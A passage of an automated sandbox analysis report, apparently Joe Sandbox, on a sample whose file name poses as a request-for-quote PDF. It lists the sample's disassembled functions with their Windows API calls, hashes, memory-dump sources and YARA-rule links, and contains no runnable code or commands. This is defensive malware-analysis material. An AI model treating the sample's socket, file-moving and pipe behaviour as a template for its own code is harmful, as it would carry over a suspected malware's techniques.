                                                                                                                • Opcode ID: e2c2f11320df6746f66891c65f76dc90a008fdafbd627d59ce585ec1dd0f2202
                                                                                                                • Instruction ID: 6991fb73c2a513b604e77e7a3edd8272a24c011dbc3a332c3457d0288be264bd
                                                                                                                • Opcode Fuzzy Hash: e2c2f11320df6746f66891c65f76dc90a008fdafbd627d59ce585ec1dd0f2202
                                                                                                                • Instruction Fuzzy Hash: C7518E71E006499FDB10CFA8DC45AEEBBF9EF09310F14811AE95AE7291E6709A41CB60
                                                                                                                Function 00A62D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62D4B
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00A62D53
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62DE1
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00A62E0C
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62E61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                • Opcode ID: d9ab024a57a5cf5948ef8ababe17766e49bd2ec01e8f422d64b7b0ebf6b66317
                                                                                                                • Instruction ID: 1205c81d40aa46c6bd7b95c1d5976936cb02155c5cf9c48657402a64f880985b
                                                                                                                • Opcode Fuzzy Hash: d9ab024a57a5cf5948ef8ababe17766e49bd2ec01e8f422d64b7b0ebf6b66317
                                                                                                                • Instruction Fuzzy Hash: 2E41A335A00609EBCF10DF68C845BDEBFB5BF45364F148165E8156B392D731AA06CBD0
                                                                                                                Function 00AC10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                  • Part of subcall function 00AC304E: _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AC1112
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1121
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC11C9
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC11F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2675159561-0
                                                                                                                • Opcode ID: 7afbe2e4fda5ad56069f038b53a0821200285c28b7ca33e5c2ac7bcf471cdb9b
                                                                                                                • Instruction ID: 4ccbf11b627b6327c63cc8e5446644138f9c487f395ce2fc007d8aa911fc460a
                                                                                                                • Opcode Fuzzy Hash: 7afbe2e4fda5ad56069f038b53a0821200285c28b7ca33e5c2ac7bcf471cdb9b
                                                                                                                • Instruction Fuzzy Hash: 8E41F335600205AFDB10DF54C884FA9B7E9EF46324F19825DFD1A9B292C774ED41CBA1
                                                                                                                Function 00AACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AACF22,?), ref: 00AADDFD
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AACF22,?), ref: 00AADE16
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AACF45
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AACF7F
                                                                                                                • _wcslen.LIBCMT ref: 00AAD005
                                                                                                                • _wcslen.LIBCMT ref: 00AAD01B
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00AAD061
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 3164238972-1173974218
                                                                                                                • Opcode ID: dc4441ec464fa3ed12a106ade7b8e1af59f7c326c052bf5ca9498985ab2cf757
                                                                                                                • Instruction ID: 7d395fd27780f0d74ea9611af8ee6c6d5de98c8cdd655fb3c21f94b99d9f8873
                                                                                                                • Opcode Fuzzy Hash: dc4441ec464fa3ed12a106ade7b8e1af59f7c326c052bf5ca9498985ab2cf757
                                                                                                                • Instruction Fuzzy Hash: EB4179719452195FDF12EFA4CA81ADEB7B8AF09740F0000E6E545EB182EF34AB45CB50
                                                                                                                Function 00AD2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AD2E1C
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2E4F
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2E84
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AD2EB6
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AD2EE0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD2EF1
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AD2F0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: 6203c5447f042866420ed48932a4fab0fe07e155ec85b13e088e79b87b1ed944
                                                                                                                • Instruction ID: b296ff39e0979eb990f8e10a0860f715dc3be5a50bc01d4ee1a66968879fd639
                                                                                                                • Opcode Fuzzy Hash: 6203c5447f042866420ed48932a4fab0fe07e155ec85b13e088e79b87b1ed944
                                                                                                                • Instruction Fuzzy Hash: C0311530645141AFDB21CF58DC84FA53BF0FBAA760F5441A6FA228B2B1CB71E841DB00
                                                                                                                Function 00AA7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7769
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA778F
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AA7792
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA77B0
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AA77B9
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AA77DE
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA77EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 122db465c9e90969776a5f1012f7cf452e55eb94b8527d671ff5d1f6cc528d7f
                                                                                                                • Instruction ID: 6985c101adfcbc1472f88afd88d516c68e97f17cef295fcd4f6de2eea83ca10f
                                                                                                                • Opcode Fuzzy Hash: 122db465c9e90969776a5f1012f7cf452e55eb94b8527d671ff5d1f6cc528d7f
                                                                                                                • Instruction Fuzzy Hash: CE218176605219AFDB10DFA8CC88CBF77ACEB0A7647448126B915DB190D770DC46C760
                                                                                                                Function 00AA77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7842
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AA7868
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AA786B
                                                                                                                • SysAllocString.OLEAUT32 ref: 00AA788C
                                                                                                                • SysFreeString.OLEAUT32 ref: 00AA7895
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00AA78AF
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AA78BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 80bf00c46d668a877ba48fe1d4cd8752c9409281ba297e2b18ad2a853328d006
                                                                                                                • Instruction ID: dcc0c48c5959216d99dcbc96ff1c37844ab509781b905f3d692063e5ca117be2
                                                                                                                • Opcode Fuzzy Hash: 80bf00c46d668a877ba48fe1d4cd8752c9409281ba297e2b18ad2a853328d006
                                                                                                                • Instruction Fuzzy Hash: 4D218E72609205AFDB109BE8DC8CDAF77ACEB0E3607508125B915CB2A5D778DC81CB64
                                                                                                                Function 00AB04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00AB04F2
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AB052E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandlePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                • Opcode ID: f274cdd262ee0ba4db3e04e6a6b4d3255b122337424ceb1b5a9a2cc09eb80f3f
                                                                                                                • Instruction ID: f6cc19ce48793e7e6d0ae616b3fcb65d8b52bf8ddf1153a36025fa5962db21ce
                                                                                                                • Opcode Fuzzy Hash: f274cdd262ee0ba4db3e04e6a6b4d3255b122337424ceb1b5a9a2cc09eb80f3f
                                                                                                                • Instruction Fuzzy Hash: B6214BB5500206ABDB309F69DC44EDA7BB8AF54724F208B19E8A2D62E2D7709941CF20
                                                                                                                Function 00AB05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AB05C6
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AB0601
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandlePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 1424370930-2873401336
                                                                                                                • Opcode ID: 939a7a27e01d86969f735184ce1710638f703f55b692cfa1b52fa45b1fa6ca44
                                                                                                                • Instruction ID: b2cecc9c47ff1798339c6c7e7285d90445b092a036aa83ff46dcf7d1659ad831
                                                                                                                • Opcode Fuzzy Hash: 939a7a27e01d86969f735184ce1710638f703f55b692cfa1b52fa45b1fa6ca44
                                                                                                                • Instruction Fuzzy Hash: A4214F755003169BDB209F699C14EDB7BE8BF95730F204B19F8A1E72E2D7B09961CB10
                                                                                                                Function 00AD40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A4600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                  • Part of subcall function 00A4600E: GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                  • Part of subcall function 00A4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AD4112
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AD411F
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AD412A
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AD4139
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AD4145
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: 752e525e11a88e9a7c3649847a6628b508205b95893ef700afd46439d9f77175
                                                                                                                • Instruction ID: 0bb25de727a0f1e60af90d762109729e3de9e38d0fae1103b888b06bc6d29c97
                                                                                                                • Opcode Fuzzy Hash: 752e525e11a88e9a7c3649847a6628b508205b95893ef700afd46439d9f77175
                                                                                                                • Instruction Fuzzy Hash: 8F1193B1150119BFEF118F64CC85EE77F6DEF08798F008111B718A2190CB769C21DBA4
                                                                                                                Function 00A7D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A7D7A3: _free.LIBCMT ref: 00A7D7CC
                                                                                                                • _free.LIBCMT ref: 00A7D82D
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7D838
                                                                                                                • _free.LIBCMT ref: 00A7D843
                                                                                                                • _free.LIBCMT ref: 00A7D897
                                                                                                                • _free.LIBCMT ref: 00A7D8A2
                                                                                                                • _free.LIBCMT ref: 00A7D8AD
                                                                                                                • _free.LIBCMT ref: 00A7D8B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                • Instruction ID: 1ed3d0e6ecc2f7b12a46c921eb8d35b3348261ff964e6d30eacd1c494ba46660
                                                                                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                • Instruction Fuzzy Hash: E9115E72540B04AAD621BFB4CE47FCBBBECAF80700F44C825B29DAA092DA65B5458760
                                                                                                                Function 00AADA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AADA74
                                                                                                                • LoadStringW.USER32(00000000), ref: 00AADA7B
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AADA91
                                                                                                                • LoadStringW.USER32(00000000), ref: 00AADA98
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AADADC
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00AADAB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 4072794657-3128320259
                                                                                                                • Opcode ID: 9688603a9bd275959e576a96dfde281f3bd4e9f86582fa15b9209f7a948eb7a4
                                                                                                                • Instruction ID: b81d1e5b9c0ed8a54cdc0d11b21e8d63f365e812cd5798166ef393cad045dab1
                                                                                                                • Opcode Fuzzy Hash: 9688603a9bd275959e576a96dfde281f3bd4e9f86582fa15b9209f7a948eb7a4
                                                                                                                • Instruction Fuzzy Hash: A40162F25002197FE711DBE09D89EEB376CE709311F800592B747E2081EA749E858F74
                                                                                                                Function 00AB096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(0115E370,0115E370), ref: 00AB097B
                                                                                                                • EnterCriticalSection.KERNEL32(0115E350,00000000), ref: 00AB098D
                                                                                                                • TerminateThread.KERNEL32(01159C78,000001F6), ref: 00AB099B
                                                                                                                • WaitForSingleObject.KERNEL32(01159C78,000003E8), ref: 00AB09A9
                                                                                                                • CloseHandle.KERNEL32(01159C78), ref: 00AB09B8
                                                                                                                • InterlockedExchange.KERNEL32(0115E370,000001F6), ref: 00AB09C8
                                                                                                                • LeaveCriticalSection.KERNEL32(0115E350), ref: 00AB09CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 3fcd9a890f756807ff199268fcdf0ac62c0fb1fb61d57a7cd8463ff1fdc6c421
                                                                                                                • Instruction ID: ad8ec0be7e973eaadab6cf54528a1ea0d4a8dbc81e7437c4b3795757cabf3765
                                                                                                                • Opcode Fuzzy Hash: 3fcd9a890f756807ff199268fcdf0ac62c0fb1fb61d57a7cd8463ff1fdc6c421
                                                                                                                • Instruction Fuzzy Hash: FAF0CD71483513ABD751AB94EE89BD6BB29BF05712F801116F202948A1C7759476CF90
                                                                                                                Function 00AC1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                Download Yara Rule
